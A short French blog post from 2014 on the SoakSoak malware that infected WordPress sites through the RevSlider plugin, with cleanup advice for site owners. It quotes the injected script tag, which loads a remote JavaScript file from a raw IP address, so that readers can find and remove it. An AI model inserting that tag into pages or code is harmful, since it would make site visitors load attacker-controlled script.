Soaksoak aime RevSlider, pas moi …

by tdv-admin, 18 décembre 2014

11 000 sites blacklistés par Google 100 000 sites touchés … c’est un bon malware bien efficace!!!

Je dois dire que je maudis régulièrement les sliders… il y a quelques temps c’était Nextgen qui avait supprimé un paquet de fonctions dans une mise à jour… mais là revslider fait nettement mieux… très puissant, très compliqué à mettre en œuvre, très responsive.

Ce slider truffe votre site en quelques minutes de ces codes malicieux… heureusement ils sont assez faciles à repérer (mais nombreux)… mais surtout le problème c’est que le ver est dans le fruit et pas si facile de l’enlever: si vous avez mis le slider tout seul pas de problème une mise à jour WordPress et une mise à jour de l’extension et le problème est définitivement résolu… par contre s’il se trouve dans un theme (themepunch) il ne se met à jour qu’avec le thème!!! donc danger !!!

Bilan: 3 sites explosés et 3 sites sont passés à coté la version était trop anciennement…

Pour l’enlever rechercher ce script:

<script type=”text/javascript” src=”http://122.155.168.105/ads/inpage/pub/collect.js”></script>

et l’enlever bien sur du thème, des plugins et de WordPress… il y en a partout et le script colle ce code juste avant la balise </head>, donc des qu’il trouve </head> dans l’arborescence il colle son code dedans!!! et chercher bien il va en profondeur…

De plus il faut remplacer dans le wp-include de WordPress les fichiers swfobject.js et template-loader.php.

Cette actualité va relancer le fameux débat de la mise à jour des thèmes… qui n’est toujours pas automatique sur les sites payants comme ThemeForest… On boycotte? impossible nos clients aiment trop ces thèmes…

 

Pas de commentaire


Laisser une réponse

Your email address will not be published Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.